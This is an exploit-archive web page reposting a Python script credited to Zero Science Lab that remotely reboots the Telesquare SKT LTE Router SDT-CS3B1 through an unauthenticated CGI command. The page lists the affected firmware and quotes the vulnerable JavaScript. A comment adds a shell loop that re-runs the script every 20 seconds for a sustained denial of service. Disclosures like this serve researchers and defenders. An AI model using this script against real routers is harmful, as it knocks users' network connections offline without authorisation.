首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Telesquare SKT LTE Router SDT-CS3B1 - Denial of Service
来源:https://www.zeroscience.mk 作者:LiquidWorm 发布时间:2017-12-28  
#!/usr/bin/env python
#
#
# Telesquare SKT LTE Router SDT-CS3B1 Remote Reboot Denial Of Service
#
#
# Vendor: Telesquare Co., Ltd.
# Product web page: http://www.telesquare.co.kr
# Affected version: FwVer: SDT-CS3B1, sw version 1.2.0
#                   LteVer: ML300S5XEA41_090  1 0.1.0
#                   Modem model: PM-L300S
#
# Summary: We introduce SDT-CS3B1 LTE router which is a SKT 3G and 4G
# LTE wireless communication based LTE router product.
#
# Desc: The router suffers from an unauthenticated reboot command execution.
# Attackers can exploit this issue to cause a denial of service scenario.
#
# --------------------------------------------------------------------
# /lte/lteuicc.shtml:
# -------------------
#
# 858: function RebootRequest()
# 859: {
# 860:     var url = "../cgi-bin/lte.cgi?";
# 861:     var param = "Command=Reboot";
# 862:     XHRPost(RebootHandle, url, param, false ); //sync call
# 863: }
#
# --------------------------------------------------------------------
#
# Tested on: lighttpd/1.4.20
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2017-5444
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5444.php
#
#
# 22.12.2017
#
 
 
import sys, requests
 
if len(sys.argv) < 2:
    print 'SKT LTE Router SDT-CS3B1 Remote Reboot'
    print 'Usage: b00t.py <ip> <port>\n'
    quit()
 
ip = sys.argv[1]
port = sys.argv[2]
 
r = requests.get("http://"+ip+":"+port+"/cgi-bin/lte.cgi?Command=Reboot")
 
# shw: while true; do ./b00t.py 10.0.0.17 8081; sleep 20; done
#print r.content  #if in r.content: <xml></xml>, reboot true.
 
print "Router rebooted."
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Sendroid < 6.5.0 - SQL Injecti
·SysGauge Server 3.6.18 - Denia
·COMTREND ADSL Router CT-5367 -
·DotNetNuke DreamSlider 01.01.0
·GetGo Download Manager 5.3.0.2
·ALLMediaServer 0.95 - Buffer O
·Oracle MySQL UDF Payload Execu
·Kingsoft Antivirus/Internet Se
·Trend Micro Smart Protection S
·HP Insight Control For VMware
·Xbox 360 Aurora 0.6b Default C
·pfSense 2.1.3-RELEASE (amd64)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved